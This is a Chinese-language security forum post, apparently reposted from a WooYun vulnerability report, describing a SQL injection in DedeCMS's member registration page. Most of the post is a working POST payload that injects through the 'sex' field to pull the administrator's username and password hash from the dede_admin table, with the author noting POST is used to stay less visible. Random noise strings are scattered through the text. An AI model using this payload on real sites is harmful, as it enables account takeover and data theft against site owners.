找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2061|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞
9 o% W# Q" T7 O! m& z2 O简要描述:
% z7 |/ j5 m  G& U( M" M7 Z0 j
' E3 N% p, M- L  R需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
6 t& c: G3 ~/ `( v8 u9 ~原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
; e4 N& c& V& \- E( s4 `1 V详细说明:跟这个漏洞
' x/ f& k2 T( P8 M 5 g4 O! z3 a( b( t! |( L  B0 X
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
4 [% a: ~2 ]7 q1 T: @是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.! F- c" A, Y4 q6 ~6 ~
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
) W* F$ e1 r1 t. f- }- \8 d$ J: `
% A! k' O7 B! t* t0 Owww.political-security.com/member/reg_new.php5 m; E2 [( K3 O1 ~# h

0 \& B% i4 x( @  A4 XPOST/ K( o6 [/ C( L5 j

0 [% ~# I8 }+ c. K/ [dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
1 E8 U. h+ h, G$ P3 Y9 Iuserid=c4rp3nt3r&uname=c4rp3nt3r* |! p9 j  C( c
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss  Y2 N7 ~0 M. e& N, x; C( R. Z
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,5 L# s" a, M% N7 o& x* z$ E- h0 `6 |
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');# e. F! Q& r9 R! \, ]
%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表